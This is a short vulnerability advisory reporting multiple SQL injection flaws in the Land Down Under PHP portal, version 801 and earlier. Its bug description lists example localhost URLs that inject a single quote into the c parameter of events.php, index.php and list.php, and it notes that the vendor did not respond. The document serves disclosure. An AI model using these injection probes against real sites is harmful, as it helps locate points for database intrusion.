lduSQL.txt

`TITLE:  
======  
  
Land Down Under 801 And Prior Multiple SQL Injection Vulnerabilities  
  
  
SEVERITY:  
=========  
  
Medium  
  
  
SOFTWARE:  
=========  
  
Land Down Under version 801 and prior  
  
Support Website : http://www.neocrome.net  
  
  
INFO:  
=====  
  
Land Down Under is a multiple portal system which includes many different options like   
  
forum, statistic, site map, article menu and many more. The portal is powered by PHP and   
  
MySQL.  
  
  
BUG DESCRIPTION:  
===============  
  
The portal system is vulnerable to various sql injection attacks, here are some examples:  
  
http://localhost/ldu/events.php?c='  
  
http://localhost/ldu/events.php?f=incoming&c='  
  
http://localhost/ldu/events.php?c=%27  
  
http://localhost/ldu/events.php?f=incoming&c=%27  
  
http://localhost/ldu/index.php?c='  
  
http://localhost/ldu/index.php?c=%27  
  
http://localhost/ldu/list.php?c='&s=title&w=asc&o=1&p=1  
  
http://localhost/ldu/list.php?c=%27&s=title&w=asc&o=1&p=1  
  
  
VENDOR STATUS:  
==============  
  
The vendor was contacted using the contacts link on the main page.  
No response recieved till date.  
  
  
CREDITS:  
========  
  
This vulnerability was discovered and researched by -  
  
matrix_killer of h4cky0u Security Forums.  
  
  
mail : matrix_k at abv.bg  
  
web : http://www.h4cky0u.org  
  
Greets to all omega-team members  
  
  
ORIGINAL:  
=========  
  
http://h4cky0u.org/viewtopic.php?t=2371  
`